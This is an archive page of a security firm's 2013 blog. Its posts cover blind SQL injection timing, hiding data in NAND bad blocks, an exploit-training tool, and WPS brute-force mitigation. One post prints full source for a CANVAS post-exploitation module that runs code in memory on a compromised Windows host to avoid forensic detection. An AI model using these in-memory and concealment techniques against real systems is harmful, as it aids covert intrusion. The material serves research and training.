Thursday, February 28, 2013

Infiltrate Preview - Exfiltrate: Efficient Blind SQLi

Most of my work at Immunity is focused on the large-scale detection of vulnerabilities in web applications. Naturally, a good portion of my effort has gone towards detecting SQL injections (SQLi). Not only are they among the most common vulnerabilities to be found, but they are often the most critical, as they can get an attacker's foot in the door.

Of course, in order for an SQLi to be useful, there has to be some measurable response from the database that is being injected into. Timing attacks have proven to be the most reliable method for detecting an SQLi, as they do not rely onany output from the database making it through to the interface layer of the target web page or service. Commonly, this type of vulnerability is known as a "blind" SQL injection.

The basic idea behind an SQLi timing attack is to use SLEEP commands to force the database on the back end to delay its response. You then ask the database a series of true/false questions. If a response comes back at least "sleep_time" seconds later, you know that the answer is true.

An SQLi detection (top) and a test run against a page with no SQLi (bottom)

This simple technique almost guarantees the validity of an SQLi vulnerability, however it comes with several challenges. Real world attacks often involve VPNs, proxies, and other technologies that can add considerable uncertainty to response times. A good timing attack algorithm has to be able to account for these variables and at the same time strive to keep sleep times as low as possible. Which leads to the second major challenge of timing attacks: efficiency.

 Even with an attack against a local web server, the algorithm I am working with is only capable of pulling data from a database at ~2kbit/s. That's not nearly fast enough when the goal is to download the target's entire database. So how can we speed up the process? That is the main question I am asking right now in my research, and there are a number of roads to go down in searching for the answer. To sample a few potential solutions:

  • Unblinding: The database exists, after all, to provide data to the interface layer. Can we move the data we want somewhere where we can actually see it?
  • Get curious: Why ask just one question?
  • Distribute: Nobody likes a DoS, so architectures are more commonly accounting for traffic spikes. How many questions can the database answer at the same time?
  • Prediction: If we have some of the data, can we predict the rest?

In my talk at Infiltrate, I'll be demonstrating some of these ideas. Know of another technique? Let me know and I may shamelessly implement it!

Wednesday, February 27, 2013

Infiltrate Preview - NAND-Xplore -> Bad Blocks = Well Hidden

Please, welcome Josh "m0nk" Thomas, our first Infiltrate Guest Blogger!

Post-Ex can be sexy


So, you’re frustrated: You’ve spent countless nights discovering the most epic remote mobile 0day imaginable and innumerable hours crafting an intricate payload… only to get the whole thing popped by some stupid Android based AV variant. It’s not like you write typical “churn and burn” malware or ransom-ware where everything is on an expendable cycle; you really are trying to pull off some covert, next-level long term injections and they all just caught fire. Hmmm… It might be time to calm down on the offensive front until you have an acceptable post-exploit landscape to build upon.

“But m0nk, post-exploit is boring and not sexy; right?”

Actually, I think you are dead wrong. Post exploitation can actually be far more deviant than exploitation and the findings typically have a longer shelf life. With that mentality in mind, the NAND-Xplore project was born. The NAND-Xplore project is an attempt to investigate just how deep files can be hidden on an embedded system, starting with a deep understanding of the “bare metal hardware” well below the operating environment. The project attempts to expose weaknesses in the actual NAND data storage hardware / implementation architectures and showcase the vulnerable underpinnings across the spectrum of NAND based platforms. The project is focused on 2 POC tools: one to hide files on NAND devices and one to find them. The overall assumption of the project is that real world advanced malware already contains these tricks, we just don’t know about it yet.

Before the Infiltrate talk itself, I thought it might be useful to share some background info on the NAND Flash technologies themselves. The talk will pick up where this blog post leaves off, primarily with how the Linux kernel interacts with NAND flash and how those interactions can be manipulated and controlled.

A Deeper Understanding of How NAND Functions

Sample NAND Prototype chip with visible blocks and pages

Hardware functionality of actual NAND Flash

In the most basic sense, NAND devices store individual bits of data in a multidimensional array of floating-gate transistors. The floating-gate transistors allow each cell to trap individual electrons, thus keeping or removing a charge. It is this charge that corresponds to a single 0 or 1 for the device. The multiplexed transistor design, coupled with the concept of Fowler-Nordheim tunnel injection and release, allows this grid of floating gates to access cells at a single bit level. In layman’s terms, consider the NAND flash to behave as a highly dense, addressable LED array.

A Simple NAND Circuit


Each individual flash cell is contained in a collection designated as a page. Pages on NAND devices are typically collections of 512, 2048 or 4096 bytes. In turn, each page is collected into a construct known as a block. NAND blocks typically follow an exponential based size paradigm and can range from 16 KB to 512 KB.

While the grid architecture of NAND flash allows for addressing at the single bit level, such accuracy comes with a hard set of limitations:

  • All bits on the device default to and are initially set to a 1.The shift from a 1 to a 0 is a simple electronic pulse to open the gate and dump the stored electron. Sadly, shifting the other direction (from a 0 to a 1) is non trivial and cannot be preformed at the bit level, only at the block level. As such, shifting a stored byte of 1111 1111 to 1010 1010 is trivial but the reverse would entail erasing and entire block of 512 KB.
  • The physical floating-gate transistors are fragile and slowly wear down over time. Typical industry expectations are that each gate can survive around 100,000 state changes before becoming unreliable and unstable. Once a block has become unstable, the NAND controller has the ability to mark it “bad”. This designation will ensure the block is removed from rotation and can no longer be read or accessed automatically.
  • As the gates wear over time, charge leakage can occur. This leakage will corrupt neighboring cells and their stored information. Charge leakage can also occur with exceptionally high levels of repeated reading even without writing to a cell. This is mostly due to the power utilized across the grid to query a specific cell.


Given these limitations, NAND designers and manufacturers introduced automated leveling across the devices. This process attempts to distribute digital information across the hardware in an even manner, not allowing any single bit, page or block to be utilized more than another. The leveling software will also copy highly accessed information around the NAND to discourage charge leakage. If one has the correct tools, they can see this phenomenon by low- level analysis of a NAND. Typically, a forensics analyst can view multiple histories of a file because the NAND flash controller will elect to copy the entire file to a new block of NAND instead of modify the existing imprint. These older versions of the file stay resident until the block is reset and new data is written. This, as well as all other NAND interactions, is managed by the NAND controller hardware. This NAND controller is also a main culprit for why writing successive 0’s and 1’s repeatedly over an entire device is meaningless to the technology, typically because the NAND controller will simply disallow such wasteful access to the memory.

Toshiba NAND Reference Design with NAND Controller


The final applicable detail about NAND flash pertains to mass production yields, transistor size and quality control. Manufacturers are constantly pushing the size of this hardware to be well below a 100% reliable component threshold. As such, devices are known to contain and ship with bad and unusable sections. These sections, much like the blocks that have exhausted their maximum number of times data can be written, are marked as “bad” at the controller level using a collection of NAND flash based error codes. These blocks are simply considered unusable by the overall system and are removed from the addressable space of the memory by the NAND controller. The NAND controller supports this functionality by keeping an active map of the hardware detailing valid and error prone blocks.
Lastly, it should be noted that most but not all embedded NAND flash devices contain a hardware based NAND controller. Those devices that do not contain controlling hardware, such as smart cards, USB storage devices and the like, expect the controlling operating system to mark, flag, control and manipulate the hardware directly. As such, most modern operating systems have a basic understanding of NAND error and correction codes. For the devices that do contain hardware-based controllers, the operating system and hardware drivers preform read and write operations in a similar manner to their older magnetic platter counterparts.

Overview of the NAND Flash Standards

The 2 main standards bodies relevant to NAND are JEDEC and ONFI.   

Development NAND Breakout with a standard TSOP connection

The JEDEC (Joint Electronic Device Engineering Council) committee is primarily concerned with ensuring the various vendors and manufacturers of NAND Flash hardware conform to certain chip package hardware standards. JEDEC is also concerned with ensuring general interoperability between manufacturers and NAND designs. JEDEC provides this services for numerous types of hardware and is far from a NAND specific committee.
The ONFI (Open NAND Flash Interface) group is a governing body for NAND Flash specific interface standards. The group intends to dictate how NAND will interface with other hardware and (to some extent) other software in the wild.
In general, most NAND devices connect to other hardware with either a TSOP (Thin, Small outline package) or BGA (Ball Grid Array) connection. The referenced standards dictate the footprint and layout of the hardware. In typical situations, embedded NAND is delivered on a 169 ball BGA package.
Standard Types of NAND to Board connections

Raw NAND vs. FTL Technologies

NAND Flash can come in a variety of configurations when manufactured. In specific relation to this research we can categorize them as such:
  • Raw NAND
  • NAND + FTL (Managed NAND)
Raw NAND Flash is a slab of NAND storage in its most basic form and all management of the hardware and storage interactions are performed in software outside of the NAND. The Linux kernel utilizes the MTD (Memory Technology Device) subsystem to interact with these devices. This grouping contains only bare NAND and other MTD based devices. To add to the confusion, some raw NAND devices do have embedded ECC (error correction) and simple block management. The main differentiation in this instance is the Linux kernel is treated as the master controller of the hardware, with the embedded processing simply supporting.


NAND + FTL devices contain an on package NAND controller that manages the slab of NAND flash internal to the chip. This controller will manage bad blocks, wear leveling and data access internally and provide a FTL (Flash Transition Layer) interface to outside software such as the Linux kernel. The FTL presents the NAND hardware as a standard block device externally. Though there are significant differences in implementation, this broad grouping contains MMC, eMMC, SD and SSD devices.
Raw NAND vs. Managed NAND (FTL)

Revisiting Post-Ex: Moving forward

Now that we all have a good understanding of the basic NAND architecture, we can have a little fun with data and process hiding. See you @ Infiltrate.












Monday, February 25, 2013

VisualSploit 2.0

Immunity is well known for its product base that is designed to help the lives and duties as network professionals, security auditors and penetration testers much easier.  However one of the lesser known features of CANVAS is VisualSploit.

VisualSploit is a learning utility that we created specifically for our popular Unethical Hacking training course that we conduct at INFILTRATE.

I have been an instructor of this course for a few years now so I have been in a position to see how a lot of people consume, assimilate and digest topics such as buffer overflows, memory corruption, debugging and assembly and the conclusion of this analysis is that these topics are best illustrated with simple, visual tools.  This way the students can walk away with a solid understanding of what happens before, during and after a buffer overflow.

VisualSploit is that simple, visual tool.  I decided to create VisualSploit v2.0 for a few reasons but topping the list is because I was paying close attention to how the tool could be improved to make sure the students got the most out of training and learning about these topics.

The new VisualSploit v2.0 web interface




During the Unethical Hacking course we teach you everything you need to know about assembly in order to write an exploit for buffer overflows.  With the help of VisualSploit you can literally go from analyzing the crash in Immunity Debugger to a working exploit/proof of concept in a matter of minutes because no programming is required.  VisualSploit behind the scenes just builds a CANVAS exploit for you which means that everything you build will be available to you as a regular exploit module the next time you start up CANVAS.  You're welcome.

This visual and hands-on method of teaching and learning about buffer overflows is very effective.  I have yet to encounter a student who didn't have that "ah-ha!" moment where it all clicked and they were able to finish writing the more challenging (and fun) exploits for real-world applications by the end of the course.

So come join me in April during the INFILTRATE edition of the Unethical Hacking class.  It will be fun and educational but more importantly you get to break stuff.

- @MarkWuergler


Friday, February 15, 2013

MOSDEF-C for you and me

One of the super neat things about CANVAS and MOSDEF is that it provides a vehicle to write code that executes in memory of an exploited host, meaning it doesn't have to touch disk if you don't want it to. This is a boon for covertness as it requires any defensive measures to do in memory forensics. So today we'll take a look at a quick post exploitation command that I wrote up for CANVAS based on a Windows kernel quirk discovered by Walied Assar.

Walied discovered a signedness error in NtSetInformationThread, I'll let his blog cover the specifics but what it means for us is that we can set a thread's I/O and memory priority to max. While this isn't terribly relevant in a security context (you could leverage a more efficient DoS on the box you have code exec on, but that's silly), writing up a quick module is demonstrative so let's go ahead and dive in!

When you start out on this path I would strongly encourage you to have working C/C++ code to base the module on because debugging in this scenario can be a frustrating process. So you will need:

1) Working C/C++ code
2) A Windows 7 VM with Immunity Debugger installed
3) A standard callback trojan deployed on the Win7 VM

When writing a new CANVAS module you'll need to create a new directory under CANVAS_ROOT/exploits with the module's name (note '-' is not allowed in module names so use '_' instead), and then within that directory you'll need a dialog.glade2 file as well as a .py with the module name. So my directory structure looks like:

CANVAS_ROOT/exploits/threadio
    dialog.glade2
    threadio.py

Normally we recommend that customers take an existing module and adapt it to their needs, I used windows_sniffer for this purpose but it required a lot of work since windows_sniffer is fairly complex and threadio is very simple. If you plan on writing your own commands using MOSDEF-C I'd recommend using threadio as your example, so just copy it into your exploit module's directory and give it the proper name and start modifying. Let's take a look at some souce:

#! /usr/bin/env python

# Proprietary CANVAS source code - use only under the license agreement
# specified in LICENSE.txt in your CANVAS distribution
# Copyright Immunity, Inc, 2002-2013
# http://www.immunityinc.com/CANVAS/ for more information

import sys
if "." not in sys.path: sys.path.append(".")


from localNode          import localNode
from timeoutsocket      import Timeout
from MOSDEF.mosdefutils import intel_order
from ExploitTypes.localcommand import LocalCommand

NAME                        = "threadio"
DESCRIPTION                 = "Set thread I/O and memory priority to max"
VERSION                     = "0.1"
GTK2_DIALOG                 = "dialog.glade2"
DOCUMENTATION               = {}
DOCUMENTATION["References"] = "http://waleedassar.blogspot.com/2013/02/kernel-bug-0-threadiopriority.html"
DOCUMENTATION["Notes"]      = """

Tested on Win7 x86

A module to demonstrate MOSDEF-C, if you're looking to pass simple values (int) 
back from the host this is a good demonstration

It will attempt to set a thread's I/O and memory priority to the maximum assignable values

"""

PROPERTY               = {}
PROPERTY['SITE']       = "Local"
PROPERTY['TYPE']       = "Commands"
PROPERTY['ARCH']       = [ ["Windows"] ]

I generally call this the preamble to the module, where we take care of imports, the documentation dictionary and the properties dictionary. All of this should be easy to understand if you've done any Python so I'll just touch on a few points. 1) All the variables are required (NAME, DOCUMENTATION, etc), 2) it is worth your while to fill these out completely when you begin writing the module especially the references section. Finding that blog post you want to remember two months from now is not very fun.


class theexploit(LocalCommand):
    def __init__(self):
        LocalCommand.__init__(self)
        self.result         = ""
        self.name           = NAME       

    def run(self):
        self.setInfo("%s (in progress)" % (NAME))

        node     = self.argsDict['passednodes'][0]
        type     = node.nodetype.lower()
        nodename = node.getname()

        if isinstance(node, localNode):
            self.log('Node of type %s not supported.' % type)
            return 0
            
        if type not in ['win32node']:
            self.log('Node of type %s not supported yet.' % type)
            return 0

"thexploit" class is the standard class from which all modules are run, by passing LocalCommand (in lieu of say tcpexploit) we tell CANVAS what type of module this is. Next we get into the run function which is another required function and where in this case all of our heavy lifting occurs.

With all command type modules it's always a good plan to put in some helpful error checking which you see with our first two if statements. node = self.argsDict['passednodes'][0] provides us a node object which we can compare against another object type, localNode. If you've ever used the CANVAS GUI localNode is the red circle that represents your CANVAS host, so here we check to ensure that isn't selected, because commands are meant to be run on compromised hosts rather than your CANVAS host. Next we get our node type with type = node.nodetype.lower() and check it against a list of node types this will work against. Since this is a Windows kernel issue it makes sense that we only allow the module to be run on Windows nodes.

code = """
        #import "remote", "ntdll.dll|ZwSetInformationThread" as "ZwSetInformationThread"
        #import "remote", "ntdll.dll|ZwQueryInformationThread" as "ZwQueryInformationThread"
        #import "remote", "kernel32.dll|GetCurrentThread" as "GetCurrentThread"
        #import "remote", "kernel32.dll|GetCurrentThreadId" as "GetCurrentThreadId"
        #import "local", "sendint" as "sendint"
        void main() {
            int success;
            int threadId;
            int setResult;
            int queryResult;
            unsigned long p1;
            unsigned long p2;
            
            success = 42;
            p1 = 0xFF3FFF3C;
            p2 = 0;
            
            threadId = GetCurrentThreadId();
            sendint(threadId);
            setResult = ZwSetInformationThread(GetCurrentThread(), 0x16, &p1, 4);
            sendint(setResult);
            queryResult = ZwQueryInformationThread(GetCurrentThread(),0x16, &p2,4,0);
            sendint(queryResult);
            sendint(success);
        }
        """
        
        # Compile the code and ship it over
        vars = {}
        node.shell.clearfunctioncache()
        request = node.shell.compile(code, vars)
        node.shell.sendrequest(request)

This is the meat of our module. I'll leave the specifics of the C code to the blog post referenced in the first paragraph. But I do want to point out a few things. First, this example is tied to MOSDEF-C for win32, if you're interested in MOSDEF-C for win64 I'll refer you to the windows_sniffer module, the changes are important but not difficult. In MOSDEF-C you have to import all your functions, you do this with a line like: #import "remote", "ntdll.dll|ZwSetInformationThread" as "ZwSetInformationThread". So a few things to note here, MSDN is your friend for determining which DLLs should contain which functions but save yourself the aggravation and check that this is the case by using Immunity Debugger. Open a program that has your DLL loaded, alt+e to get the imports list, right click your DLL and choose View Names, find your function name. Additionally, it is wise (though not required) to import the function into MOSDEF-C with the same name as it exists in the Windows API.

Having a line like: #import "remote" "ntdll.dll|ZwSetInformationThread" as "ZwSetInformationThreat"; is very annoying to debug if you use ZwSetInformationThread() later. Which brings me to my next point: yacc will give you some help when compiling on the CANVAS side before shipping it over to the target host but if it passes compilation any host side errors you will have to use your cunning, savvy and a debugger to find.

Variables do take a bit to get used to. Declaring a variable via: int ret = 4; gave me headaches. So I declared all my variables at the top then assigned them values after they'd all been declared. It may not be your style but I stopped getting wonky yacc errors after I followed this method.

sendint is a mosdef built in that allows you to, as you expected, send an integer back to your CANVAS host. This is incredibly useful for localizing where your MOSDEF-C might be failing. I make use of it in multiple locations, you'll note that the success variable isn't strictly required as no additional instructions are executed after the ZwQueryInformationThread call. This is a remnant of development but having a final send after all substantive instructions have been executed allows you to know that all of your code ran.

# Handle the responses
        threadId = 0
        success = 0
        threadId = node.shell.readint(signed=True)     # recv threadId
        setResult = node.shell.readint(signed=False)   # recv ZwQueryInformationThread result 
        queryResult = node.shell.readint(signed=False) # recv new thread priority
        success = node.shell.readint(signed=True)      # recv success, not strictly needed
        node.shell.leave()

As you may expect the CANVAS has a corresponding readint() for receiving these values. I found it helpful to have my CANVAS python variable names and my MOSDEF-C variable names be consistent and to label my readint()'s with enough information that I could easily figure out which one wasn't firing. When you get into more complex code, like a readint() within a conditional statement, keeping things labeled will help immensely with debugging.

# Lets have some verbose error handling
        try:
            if threadId == 0:
                self.log("Unable to get current thread ID, this will likely fail")
            
            setResult = hex(setResult)
            if setResult != "0x0":
                self.log("Received an error when attempting to call ZwSetInformationThread")
                self.log("Error no: %s"%(setResult))
                self.log("Check here for error details: http://msdn.microsoft.com/en-us/library/cc704588.aspx")
                raise ValueError
            
            if queryResult != 0:
                self.log("Error when attemping to call ZwQueryInformationThread, the module may have worked but unable to confirm")
                raise ValueError
            
            if success != 42:
                self.log("Encountered an error before the module exited")
                raise ValueError
            
        except ValueError:
            self.setInfo("%s - Done (failed)"%(NAME))
            return 0
        
        except Exception as e:
            self.log("Encountered an unhandled exception")
            self.setInfo("%s - Done (failed)"%(NAME))
            print e.message
            return 0

This may not be the most elegant or Pythonic way to do error handling but I found it made sense to me. The more effort you put into having good error handling now means debugging this module in six months when Microsoft has adjusted something is much easier. A few functions here that are useful: self.log() will generate CANVAS log events, I recommend using this over print for debugging. self.setInfo() will set the module's status in the Current Status GUI tab and is helpful to set if others will be using your code.

        self.log("Thead Id: %d"%threadId)
        self.log("ZwSetinformationThread: %s"%setResult)
        self.log("ZwQueryInformationThread: %s"%queryResult)
        self.log("Success: %d"%success)
        
        self.setInfo("%s - Done (success)"%(NAME))
        return 1

Finally we dump some information to the user and tell CANVAS the module has completed by returning. As you can probably guess return 0 will tell CANVAS the module failed, return 1 the module succeeded.

I think the benefit to MOSDEF-C is that it quickly allows you to interface with the Windows API without touching the remote file system. There's no DLL to load, if you have a Windows CANVAS Node this code is inserted and run into the running process. A defender may be able to determine that a machine was compromised but determining what specifically was done to that machine if you make use of techniques like this can be substantially more difficult. After all, hooking the entire Windows API isn't practical.

MOSDEF-C is a bit of a labor of love. If you're interested in starting to use it I would seriously suggest starting to read through the ./MOSDEF/ directory in CANVAS and then proceeding to ./MOSDEF/MOSDEFlibc. It is a powerful tool but it's important to note some of the current implementation limitations and some of the language quirks before you start doing anything too complicated.

The link to the complete module source can be found at: http://partners.immunityinc.com/threadio.tar

Wednesday, February 13, 2013

WPS Attack Detection and Reaction

For those of us in the security industry we are well aware that reactions to attacks can take vendors a long time to develop and deploy a preventative measure.  This is especially true with embedded devices that have no auto-update feature and/or are completely forgotten about once they are up and running on the network.

As a refresher in December of 2011 an attack was published that targeted a weakness in the Wi-Fi Protected Setup (WPS) protocol that demonstrates how to significantly decrease the amount of attempts needed to derive a valid WPS PIN during a brute force attack.  This attack leaves most routers that have WPS enabled vulnerable to an attack that will allow an attacker to learn the WPA Pre-Shared Key (PSK) or WEP key as well as gain access to more configuration information.

Click here to see a video of an attack against WPS using SILICA.

Most routers are still vulnerable to this attack today because there is no easy way to disable WPS in the router's configuration interface (a regular user is not going to go through the trouble of modifying firmware) and not very many people/organizations are very good about checking for and updating new firmware.  I should probably also mention the probability that most people that use or administer a wireless router are completely oblivious to the fact that there is such a weakness in WPS and don't disable it even if they can (after all it is a protocol meant to provide a convenient method to the admin and network users).

Even though it usually takes a long time for vendors to respond to this kind of attack we have recently seen a change in Netgear's firmware that actually addresses the security weakness.  Take a look at the following section taken from a Netgear R6300 web interface:



This is the first vendor response that I have seen for the WPS PIN attack.  After 3 failed attempts the feature is disabled and you get the following message next to the feature configuration: 


 

This obviously does offer another avenue of attack in the tune of a not-so-exciting denial of service (DoS) making it easy for an attacker to turn off WPS all together.

This slightly changes the game (and by slightly I mean not very much).  It used to be that identifying that WPS is enabled was all an attacker needed to determine if the AP was vulnerable to this attack (no major or minor versions to check before launching the attack - it's kind of the same feeling you get when you are pentesting a ColdFusion server/application; it doesn't matter the version you just know it's vulnerable). 

The WPS bug and attack are not going anywhere for a long time but it's interesting to see the proactive actions of vendors hoping for an eventual extinction.  I will keep you posted if I see any similar trends.